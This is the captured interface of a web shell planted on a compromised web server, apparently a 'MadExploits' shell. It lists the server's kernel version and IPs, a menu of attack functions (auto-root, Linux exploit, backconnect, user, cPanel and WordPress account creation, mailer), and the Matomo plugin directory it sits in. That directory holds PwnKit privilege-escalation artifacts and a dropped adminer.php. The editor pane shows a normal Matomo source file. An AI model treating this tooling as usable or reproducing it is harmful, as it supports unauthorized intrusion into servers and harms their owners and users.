Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.44
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
plugins /
Live /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Categories
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ProfileSummary
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
Visualizations
[ DIR ]
drwxr-xr-x
Widgets
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
javascripts
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
stylesheets
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vue
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
API.php
16.3
KB
-rw-r--r--
Controller.php
9.77
KB
-rw-r--r--
Live.php
9.2
KB
-rw-r--r--
MeasurableSettings.php
2.02
KB
-rw-r--r--
Model.php
24.78
KB
-rw-r--r--
ProfileSummaryProvider.php
2.73
KB
-rw-r--r--
SystemSettings.php
1.71
KB
-rw-r--r--
Visitor.php
10.43
KB
-rw-r--r--
VisitorDetails.php
10.04
KB
-rw-r--r--
VisitorDetailsAbstract.php
8.81
KB
-rw-r--r--
VisitorFactory.php
1.57
KB
-rw-r--r--
VisitorInterface.php
382
B
-rw-r--r--
VisitorProfile.php
3.73
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ProfileSummaryProvider.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Plugins\Live; use Piwik\Cache; use Piwik\CacheId; use Piwik\Plugin; use Piwik\Piwik; use Piwik\Plugins\Live\ProfileSummary\ProfileSummaryAbstract; /** * */ class ProfileSummaryProvider { /** * @var Plugin\Manager */ private $pluginManager; public function __construct(Plugin\Manager $pluginManager) { $this->pluginManager = $pluginManager; } /** * Returns all available profile summaries * * @return ProfileSummaryAbstract[] * @throws \Exception */ public function getAllInstances() { $cacheId = CacheId::pluginAware('ProfileSummaries'); $cache = Cache::getTransientCache(); if (!$cache->contains($cacheId)) { $instances = []; /** * Triggered to add new live profile summaries. * * **Example** * * public function addProfileSummary(&$profileSummaries) * { * $profileSummaries[] = new MyCustomProfileSummary(); * } * * @param ProfileSummaryAbstract[] $profileSummaries An array of profile summaries */ Piwik::postEvent('Live.addProfileSummaries', array(&$instances)); foreach ($this->getAllProfileSummaryClasses() as $className) { $instances[] = new $className(); } /** * Triggered to filter / restrict profile summaries. * * **Example** * * public function filterProfileSummary(&$profileSummaries) * { * foreach ($profileSummaries as $index => $profileSummary) { * if ($profileSummary->getId() === 'myid') {} * unset($profileSummaries[$index]); // remove all summaries having this ID * } * } * } * * @param ProfileSummaryAbstract[] $profileSummaries An array of profile summaries */ Piwik::postEvent('Live.filterProfileSummaries', array(&$instances)); $cache->save($cacheId, $instances); } return $cache->fetch($cacheId); } /** * Returns class names of all VisitorDetails classes. * * @return string[] * @api */ protected function getAllProfileSummaryClasses() { return $this->pluginManager->findMultipleComponents('ProfileSummary', 'Piwik\Plugins\Live\ProfileSummary\ProfileSummaryAbstract'); } }
Close